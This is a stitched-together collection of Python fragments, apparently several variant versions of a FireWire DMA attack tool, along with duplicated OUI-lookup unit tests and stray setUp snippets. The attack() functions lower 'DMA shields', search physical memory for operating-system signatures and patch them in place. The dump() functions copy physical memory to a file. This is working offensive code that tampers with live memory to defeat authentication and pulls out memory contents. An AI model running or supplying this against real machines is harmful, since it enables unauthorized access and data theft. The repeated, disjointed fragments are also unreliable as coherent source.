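def dump(start, end, path):
    """Write the physical memory range [start, end) to the file at *path*.

    Memory is read either through a FireWire DMA device (selected
    interactively) or, when ``settings.filemode`` is set, from the memory
    image named by ``settings.filename``.  Reads proceed in chunks of
    ``settings.max_request_size``; chunks that ``needtoavoid`` flags are not
    read at all and are replaced by zero bytes in the output, so an analyst
    must not mistake those zero runs for genuine memory contents.

    Args:
        start: first physical address to dump (inclusive).
        end: address at which to stop (exclusive).
        path: output file; created/truncated in binary mode.

    Raises:
        KeyboardInterrupt: re-raised after the partial dump has been closed,
            so an interrupted run still leaves a readable file behind.
    """
    # Make sure that the right mode is set (the flag is only written here;
    # presumably read elsewhere in the tool).
    settings.memdump = True

    # Initialize and lower DMA shield.  Device selection is interactive, so
    # the time it takes is measured and handed to getdevice() below.
    if not settings.filemode:
        fw = FireWire()
        starttime = time.time()
        device_index = fw.select_device()
        # Print selection
        msg('*', 'Selected device: {0}'.format(fw.vendors[device_index]))

    # Lower DMA shield or use a file as input
    if settings.filemode:
        device = MemoryFile(settings.filename, settings.PAGESIZE)
    else:
        elapsed = int(time.time() - starttime)
        device = fw.getdevice(device_index, elapsed)

    requestsize = settings.max_request_size
    size = end - start

    # path added for Pac4Mac: the caller supplies the output name instead of
    # the former generated 'memdump_<start>-<end>.bin'.
    filename = path

    # Integer division: report whole MiB (true division prints a float).
    msg('*', 'Dumping from {0:#x} to {1:#x}, a total of {2} MiB'.format(
        start, end, size // settings.MiB))

    try:
        # The context manager closes the file on every exit path, not only
        # on success or KeyboardInterrupt.
        with open(filename, 'wb') as file:
            for i in range(start, end, requestsize):
                # Edge case: do not read beyond end when the range is not a
                # multiple of requestsize.
                if i + requestsize > end:
                    requestsize = end - i
                # Avoid accessing upper memory area if we are using FireWire
                if needtoavoid(i):
                    data = b'\x00' * requestsize
                else:
                    data = device.read(i, requestsize)
                file.write(data)
                # Print status on one line that is rewritten each iteration
                dumped = (i - start) // settings.MiB
                sys.stdout.write('[*] Dumping memory, {0:>4d} MiB so far'.format(dumped))
                if settings.verbose:
                    sys.stdout.write('. Sample data read: {0}'.format(bytes2hexstr(data)[0:24]))
                sys.stdout.write('\r')
                sys.stdout.flush()
    except KeyboardInterrupt:
        # The file is already closed here; tell the user where the partial
        # dump went and propagate the interrupt with its traceback intact.
        print()
        msg('*', 'Dumped memory to file {0}'.format(filename))
        raise

    print()  # Filler
    msg('*', 'Dumped memory to file {0}'.format(filename))
    device.close()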
class TestUtil(unittest.TestCase):
    """Checks the OUI (vendor prefix) lookup provided by FireWire."""

    def setUp(self):
        """Instantiate the FireWire helper under test."""
        self.fw = FireWire()

    def tearDown(self):
        """No per-test cleanup is required."""

    def test_init_OUI(self):
        """The OUI table is a dict and resolves a few known prefixes."""
        self.assertIsInstance(self.fw.oui, dict)
        # A couple of known prefixes and the vendor names they map to
        known = (
            (0x03, 'XEROX CORPORATION'),
            (0xE0C1, 'MEMOREX TELEX JAPAN, LTD.'),
            (0xFCFBFB, 'Cisco Systems'),
        )
        for oui, vendor in known:
            self.assertEqual(self.fw.resolve_oui(oui), vendor)
class TestUtil(unittest.TestCase):
    """Tests for FireWire's OUI-to-vendor resolution."""

    def setUp(self):
        """Create the FireWire helper whose OUI table is exercised."""
        self.fw = FireWire()

    def tearDown(self):
        """Nothing to tear down."""

    def test_init_OUI(self):
        """OUI table loads as a dict; sample prefixes resolve to vendors."""
        self.assertIsInstance(self.fw.oui, dict)
        # Test a couple of OUIs (insertion order is preserved)
        expected = {
            0x03: 'XEROX CORPORATION',
            0xE0C1: 'MEMOREX TELEX JAPAN, LTD.',
            0xFCFBFB: 'Cisco Systems',
        }
        for oui, vendor in expected.items():
            self.assertEqual(self.fw.resolve_oui(oui), vendor)
 def setUp(self):
     """Build the FireWire helper that each test exercises."""
     helper = FireWire()
     self.fw = helper
def attack(targets):
    '''
    Run one search-and-patch pass against a user-selected target.

    Memory is accessed through a FireWire DMA device chosen interactively,
    or read from the image cfg.filename when cfg.filemode is set.  The
    entries of *targets* are listed and one is selected; its signatures
    are located with searchanddestroy() and, unless cfg.dry_run is set,
    patched in place with patch().

    Returns (address, page) of the signature hit, or (None, None) when no
    signature was found.
    '''
    # Initialize and lower DMA shield.  fail() is expected to abort the
    # run; should it return, firewire would be unbound further down.
    if not cfg.filemode:
        try:
            firewire = FireWire()
        except IOError:
            fail('Could not initialize FireWire. Are the modules loaded into ' +
                 'the kernel?')
        selection_started = time.time()
        device_index = firewire.select_device()
        # Print selection
        info('Selected device: {0}'.format(firewire.vendors[device_index]))

    # List targets, then let the user pick one
    list_targets(targets)
    target = select_target(targets)

    # Print selection. If verbose, print selection with signatures
    info('Selected target: ' + target['OS'] + ': ' + target['name'])
    if cfg.verbose:
        printdetails(target)

    # Lower DMA shield or use a file as input, and set memsize
    if cfg.filemode:
        device = MemoryFile(cfg.filename, cfg.PAGESIZE)
        memsize = os.path.getsize(cfg.filename)
    else:
        wait_seconds = int(time.time() - selection_started)
        device = firewire.getdevice(device_index, wait_seconds)
        memsize = cfg.memsize

    # Perform parallel search for all signatures for each OS at the known
    # offsets
    info('DMA shields should be down by now. Attacking...')
    address, chunks = searchanddestroy(device, target, memsize)
    if not address:
        # TODO: Fall-back sequential search?  Note that the device is not
        # closed on this early return.
        return None, None

    # Signature found, let's patch.  Mask away the lower bits to find the
    # page number; being a 32-bit mask it also discards bits above bit 31.
    page_mask = 0xfffff000
    page = int((address & page_mask) / cfg.PAGESIZE)
    info('Signature found at {0:#x} (in page # {1})'.format(address, page))
    if not cfg.dry_run:
        # patch() reports whether the written bytes could be read back
        if patch(device, address, chunks):
            info('Write-back verified; patching successful')
            if cfg.egg:
                sound.play('data/inception.wav')
            info('BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!')
        else:
            warn('Write-back could not be verified; patching *may* have been ' +
                 'unsuccessful')

    # Clean up
    device.close()

    return address, page
 def setUp(self):
     """Create the FireWire helper used by the test methods."""
     self.fw = FireWire()
     return None
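def dump(start, end):
    """Dump the physical memory range [start, end) to a file.

    The output file is named ``<cfg.memdump_prefix>_<hex start>-<hex end>.bin``.
    Memory is read through a FireWire DMA device (selected interactively)
    or, when ``cfg.filemode`` is set, from the image ``cfg.filename``.
    Chunks that ``needtoavoid`` flags are never read and are written as zero
    bytes, so zero runs in the dump may be skipped regions rather than real
    memory contents.

    Args:
        start: first physical address to dump (inclusive).
        end: address at which to stop (exclusive).

    Raises:
        KeyboardInterrupt: re-raised after the partial dump has been closed.
    """
    # Make sure that the right mode is set
    cfg.memdump = True

    requestsize = cfg.max_request_size
    size = end - start

    # Open file for writing.  Opening before the interactive device
    # selection surfaces an unwritable path early; the context manager
    # closes the file on every exit path, not only success/KeyboardInterrupt.
    filename = '{0}_{1}-{2}.bin'.format(cfg.memdump_prefix, hex(start),
                                        hex(end))
    with open(filename, 'wb') as file:
        info('Dumping from {0:#x} to {1:#x}, a total of {2}'.format(
            start, end, _human_size(size)))

        # Initialize and lower DMA shield.  Selection is interactive, so
        # the time it takes is measured and handed to getdevice().
        if not cfg.filemode:
            fw = FireWire()
            starttime = time.time()
            device_index = fw.select_device()
            # Print selection
            info('Selected device: {0}'.format(fw.vendors[device_index]))

        # Lower DMA shield or use a file as input
        if cfg.filemode:
            device = MemoryFile(cfg.filename, cfg.PAGESIZE)
        else:
            elapsed = int(time.time() - starttime)
            device = fw.getdevice(device_index, elapsed)

        # Progress bar
        prog = ProgressBar(min_value=start,
                           max_value=end,
                           total_width=cfg.termwidth,
                           print_data=cfg.verbose)

        try:
            _copy_range(device, file, prog, start, end, requestsize)
        except KeyboardInterrupt:
            # Tell the user where the partial dump went, then propagate the
            # interrupt with its traceback intact.
            print()
            info('Dumped memory to file {0}'.format(filename))
            raise

    print()  # Filler
    info('Dumped memory to file {0}'.format(filename))
    device.close()


def _human_size(size):
    """Format *size* bytes in the largest of GiB/MiB that divides it evenly.

    Falls back to a floored KiB count when the size is a whole number of
    neither.
    """
    if size % cfg.GiB == 0:
        return '{0} GiB'.format(size // cfg.GiB)
    if size % cfg.MiB == 0:
        return '{0} MiB'.format(size // cfg.MiB)
    return '{0} KiB'.format(size // cfg.KiB)


def _copy_range(device, file, prog, start, end, requestsize):
    """Read [start, end) from *device* in *requestsize* chunks into *file*.

    Chunks flagged by needtoavoid() are zero-filled instead of being read.
    Each chunk is also passed to the progress bar (presumably for its
    print_data display -- confirm against ProgressBar).
    """
    for i in range(start, end, requestsize):
        # Edge case, make sure that we don't read beyond the end
        if i + requestsize > end:
            requestsize = end - i
        # Avoid accessing upper memory area if we are using FireWire
        if needtoavoid(i):
            data = b'\x00' * requestsize
        else:
            data = device.read(i, requestsize)
        file.write(data)
        # Print status
        prog.update_amount(i + requestsize, data)
        prog.draw()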
def attack(targets):
    '''
    Run one search-and-patch pass against a user-selected target.

    Memory is accessed through a FireWire DMA device chosen interactively,
    or read from the image settings.filename when settings.filemode is set.
    The available *targets* are listed and one is selected; its signatures
    are located with searchanddestroy() and, unless settings.dry_run is set,
    patched in place with patch().

    Returns (address, page) of the signature hit, or (None, None) when no
    signature was found.
    '''
    # Initialize and lower DMA shield.  fail() is expected to abort the
    # run; should it return, firewire would be unbound further down.
    if not settings.filemode:
        try:
            firewire = FireWire()
        except IOError:
            fail('Could not initialize FireWire. Are the modules loaded into the kernel?')
        selection_started = time.time()
        device_index = firewire.select_device()
        # Print selection
        msg('*', 'Selected device: {0}'.format(firewire.vendors[device_index]))

    # List targets, numbered from 1
    msg('*', 'Available targets:')
    separator()
    for number, entry in enumerate(targets, 1):
        msg(number, entry['OS'] + ': ' + entry['name'])
    separator()

    # Select target
    target = select_target(targets)

    # Print selection. If verbose, print selection with signatures
    msg('*', 'Selected target: ' + target['OS'] + ': ' + target['name'])
    if settings.verbose:
        printdetails(target)

    # Lower DMA shield or use a file as input, and set memsize
    if settings.filemode:
        device = MemoryFile(settings.filename, settings.PAGESIZE)
        memsize = os.path.getsize(settings.filename)
    else:
        wait_seconds = int(time.time() - selection_started)
        device = firewire.getdevice(device_index, wait_seconds)
        memsize = settings.memsize

    # Perform parallel search for all signatures for each OS at the known offsets
    msg('*', 'DMA shields down. Attacking...')
    address, chunks = searchanddestroy(device, target, memsize)
    if not address:
        # TODO: Fall-back sequential search?  Note that the device is not
        # closed on this early return.
        return None, None

    # Signature found, let's patch.  Mask away the lower bits to find the
    # page number; being a 32-bit mask it also discards bits above bit 31.
    page_mask = 0xfffff000
    page = int((address & page_mask) / settings.PAGESIZE)
    msg('*', 'Signature found at {0:#x} (@page # {1})'.format(address, page))
    if not settings.dry_run:
        # patch() reports whether the written bytes could be read back
        if patch(device, address, chunks):
            msg('*', 'Write-back verified; patching successful')
            msg('*', 'BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!')
        else:
            msg('!', 'Write-back could not be verified; patching may have been unsuccessful.')

    # Clean up
    device.close()

    return address, page
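def dump(start, end):
    """Dump the physical memory range [start, end) to a file.

    The output is written to ``<cfg.memdump_prefix>_<hex start>-<hex end>.bin``.
    Memory comes from a FireWire DMA device (selected interactively) or,
    when ``cfg.filemode`` is set, from the image ``cfg.filename``.  Chunks
    flagged by ``needtoavoid`` are never read and appear as zero bytes in
    the dump, so an analyst should not read those zero runs as real memory.

    Args:
        start: first physical address to dump (inclusive).
        end: address at which to stop (exclusive).

    Raises:
        KeyboardInterrupt: re-raised after the partial dump has been closed.
    """
    # Make sure that the right mode is set
    cfg.memdump = True

    requestsize = cfg.max_request_size
    size = end - start

    # Open file for writing.  The file is opened before device selection so
    # an unwritable path fails early; the context manager closes it on every
    # exit path (the old code leaked it on exceptions other than
    # KeyboardInterrupt).
    filename = '{0}_{1}-{2}.bin'.format(cfg.memdump_prefix,
                                        hex(start), hex(end))
    with open(filename, 'wb') as file:
        info('Dumping from {0:#x} to {1:#x}, a total of {2}'.format(
            start, end, _format_total(size)))

        # Initialize and lower DMA shield; the time the interactive
        # selection takes is passed on to getdevice().
        if not cfg.filemode:
            fw = FireWire()
            starttime = time.time()
            device_index = fw.select_device()
            # Print selection
            info('Selected device: {0}'.format(fw.vendors[device_index]))

        # Lower DMA shield or use a file as input
        if cfg.filemode:
            device = MemoryFile(cfg.filename, cfg.PAGESIZE)
        else:
            elapsed = int(time.time() - starttime)
            device = fw.getdevice(device_index, elapsed)

        # Progress bar
        prog = ProgressBar(min_value=start, max_value=end,
                           total_width=cfg.termwidth, print_data=cfg.verbose)

        try:
            _stream_range(device, file, prog, start, end, requestsize)
        except KeyboardInterrupt:
            # Report where the partial dump went, then re-raise with the
            # original traceback.
            print()
            info('Dumped memory to file {0}'.format(filename))
            raise

    print()  # Filler
    info('Dumped memory to file {0}'.format(filename))
    device.close()


def _format_total(size):
    """Return *size* bytes as '<n> GiB'/'<n> MiB' when evenly divisible, else floored KiB."""
    if size % cfg.GiB == 0:
        return '{0} GiB'.format(size // cfg.GiB)
    if size % cfg.MiB == 0:
        return '{0} MiB'.format(size // cfg.MiB)
    return '{0} KiB'.format(size // cfg.KiB)


def _stream_range(device, file, prog, start, end, requestsize):
    """Copy [start, end) from *device* to *file* in *requestsize* chunks.

    Avoided chunks (needtoavoid) are written as zeros instead of being read.
    Each chunk is handed to the progress bar as well (presumably for its
    print_data display -- confirm against ProgressBar).
    """
    for i in range(start, end, requestsize):
        # Edge case, make sure that we don't read beyond the end
        if i + requestsize > end:
            requestsize = end - i
        # Avoid accessing upper memory area if we are using FireWire
        if needtoavoid(i):
            data = b'\x00' * requestsize
        else:
            data = device.read(i, requestsize)
        file.write(data)
        # Print status
        prog.update_amount(i + requestsize, data)
        prog.draw()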
def attack(targets):
    '''
    Locate a target's signature in memory and patch it.

    The memory source is a FireWire DMA device picked interactively, or
    the image settings.filename when settings.filemode is set.  After the
    entries of *targets* are listed and one is chosen, searchanddestroy()
    looks for its signatures; on a hit, patch() writes the replacement
    unless settings.dry_run is set.

    Returns (address, page) for a hit, otherwise (None, None).
    '''
    # Initialize and lower DMA shield.  fail() is expected to abort; if it
    # returned, firewire would be unbound below.
    if not settings.filemode:
        try:
            firewire = FireWire()
        except IOError:
            fail('Could not initialize FireWire. Are the modules loaded into the kernel?')
        selection_started = time.time()
        device_index = firewire.select_device()
        # Print selection
        msg('*', 'Selected device: {0}'.format(firewire.vendors[device_index]))

    # List targets, numbered from 1
    msg('*', 'Available targets:')
    separator()
    for number, entry in enumerate(targets, 1):
        msg(number, entry['OS'] + ': ' + entry['name'])
    separator()

    # Select target
    target = select_target(targets)

    # Print selection. If verbose, print selection with signatures
    msg('*', 'Selected target: ' + target['OS'] + ': ' + target['name'])
    if settings.verbose:
        printdetails(target)

    # Lower DMA shield or use a file as input, and set memsize
    if settings.filemode:
        device = MemoryFile(settings.filename, settings.PAGESIZE)
        memsize = os.path.getsize(settings.filename)
    else:
        wait_seconds = int(time.time() - selection_started)
        device = firewire.getdevice(device_index, wait_seconds)
        memsize = settings.memsize

    # Perform parallel search for all signatures for each OS at the known offsets
    msg('*', 'DMA shields down. Attacking...')
    address, chunks = searchanddestroy(device, target, memsize)
    if not address:
        # TODO: Fall-back sequential search?  The device is left open on
        # this early return.
        return None, None

    # Signature found, let's patch.  Mask away the lower bits to find the
    # page number; the 32-bit mask also drops any bits above bit 31.
    page_mask = 0xfffff000
    page = int((address & page_mask) / settings.PAGESIZE)
    msg('*', 'Signature found at {0:#x} (@page # {1})'.format(address, page))
    if not settings.dry_run:
        # patch() reports whether the write-back could be verified
        if patch(device, address, chunks):
            msg('*', 'Write-back verified; patching successful')
            msg('*', 'BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!')
        else:
            msg('!', 'Write-back could not be verified; patching may have been unsuccessful.')

    # Clean up
    device.close()

    return address, page